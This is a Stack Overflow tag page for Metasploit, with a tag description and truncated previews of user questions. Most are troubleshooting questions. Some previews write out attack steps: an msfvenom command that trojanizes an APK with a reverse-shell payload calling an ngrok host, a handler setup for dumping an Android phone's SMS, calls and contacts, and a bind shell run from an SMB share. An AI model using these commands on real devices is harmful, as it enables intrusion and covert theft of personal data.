Questions tagged [metasploit]

This tag is for questions about *programming* the Metasploit framework, not for using the framework or attacking a specific site.

The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.

Since version 3 of the Framework, Metasploit has been written primarily in Ruby. Version 2 and older were written in Perl. The various payloads, stagers, and shellcodes are primarily written in C, assembly, and Java.

Metasploit is developed on Github. Documentation and community forums are available on Rapid7's community site. Questions can also be asked in the #metasploit channel on Freenode.

If your question is about using Metasploit, rather than programming with it, then it should probably go on our sister site Information Security.

If your question is about attacking a specific system, such questions are off-topic on Stack Overflow. They are also off-topic on Information Security unless they demonstrate an understanding of the concepts involved and clearly identify a specific problem.

Also, any issues resulting from using such tools without permission from the target are your own risk; we do not endorse such actions in any way.

228 questions
0
votes
1 answer

How to remotely execute a file on a SMB share as a guest

I have a Windows machine I'm trying to compromise and I've managed to gain access to a SMB share as a guest user. Currently, I've uploaded a bind_tcp payload to the share and I'd like to execute it remotely. I am able to obtain a meterpreter shell…
zxtshadow
  • 1
  • 1
  • 1
0
votes
1 answer

What encoding does payload.encoded retrieves by default in metasploit?

I am analyzing this metasploit module, and I am wondering what encoding method does payload.encoded retrieves by default in metasploit. I did a print payload.encoded in that exploit (without setting any encoder), and I get a normal string…
riviraz
  • 479
  • 1
  • 10
  • 22
0
votes
1 answer

postgres server running in local host, but postico, metasploit can't access to it Ask Question

I just bought a new MacBook Pro (Catalina 10.15.5) and used Time Machine of my old MacBook that was using the same OS (10.15.5) and the transfer went fine but now when using Postico for the first time, I can't connect to localhost. I get an error. …
Cole
  • 73
  • 1
  • 8
0
votes
0 answers

How to make a Standalone exploit with a custom payload?

First of all, what I want to achieve: I want to exploit a device with a script (in python) without metasploit (therefore standalone) and run a custom programm on the exploitet device. This should happen automatically (I just want to run the script…
0
votes
1 answer

How to solve this error while executing msfvenom?

Command msfvenom -x xxxxxx.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=16222 -o /home/snow/Desktop/xxxxxx.apk Log and error definition after running the above command: Using APK template: xxxxxx.apk [-] No platform was…
Asad
  • 1
  • 1
  • 2
0
votes
1 answer

GPG error when updating - Metasploit - How can I fix it?

GPG error while updating - Metasploit # curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall % Total %…
0
votes
0 answers

: uninitialized constant Msf (NameError)

I'm getting an error while running a ruby script. Even though I've downloaded and installed Metasploit. `
': uninitialized constant Msf (NameError)
echobash
  • 48
  • 7
0
votes
1 answer

Ruby loop overrides values

I have this file with 2 passords that i need extract them and input in a XML file: root@nirvana:~# cat old/pwdump.txt # Metasploit PWDump Export 2.0 # Generated: 2020-01-12 18:43:53 UTC # Project:…
Paulo Ferraz
  • 1
  • 1
  • 4
0
votes
2 answers

Need help figuring out what ports to use in metasploit

Device with termux: LG g8, android 9. Using my phone data not Wi-Fi. I've installed metasploit on my phone using termux and i found a tutorial online on how to use metasploit. Step 1 in tutorial was port forwarding. The tutorial used the command…
0
votes
1 answer

msfconsole on remote server

Task: install msfconsole on the remote server, and send commands to it as a file (one command per line; command’s format is standard for msfconsole. For example the first line could be use exploit/windows/exec and another line set LHOST 192.168.1.10…
h3llca7
  • 61
  • 1
  • 8
0
votes
2 answers

I want to dump call log cantacts sms with autorunscript using metasploit. but I failed to do it

I can not run the autorun script in my terminal. I want to dump call, message, and contact from android. use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST ip set LPORT 444 set AutoRunScript multi_console_command -rc…
Raj Raja
  • 1
  • 2
0
votes
1 answer

How can I remove null bytes from my object code?

I want to use my own shellcode for a buffer overflow exploit so for that I have written a script in C language[shellcode script]. I have used the following commands.: gcc -c file.c -o file.o objdump -sS -D file.o root@kali:~/shellcode# cat…
nltc
  • 83
  • 2
  • 10
0
votes
1 answer

How to execute command in a sub/Child process using bash/shell scripting or python-shell scripting

I want to automate an attack (for some testing purposes) using metasploit in kali linux. Metasploit commands are save in ms17-010.rc file, and the file is called in the script followed by meterpreter commands. I have tried both bash scripting…
0
votes
1 answer

How can I use/authenticate msfrpc with python3.x?

Edited: The code below works, and the changes are commented. As noted, with python3 one must prefix the string literals with a "b" to produce an instance of the byte type instead of a Unicode str type. I'm trying to use msfrpc (written in Python…
vdud3
  • 1
  • 3
0
votes
1 answer

Error in ruby script while running meterpreter

I love this website, it has helped me a lot through other people's questions, now I have joined so I can help each others if I can. I have an issue here. While running meterpreter (from metasploit suite) in a VM, I have tried a script that relays…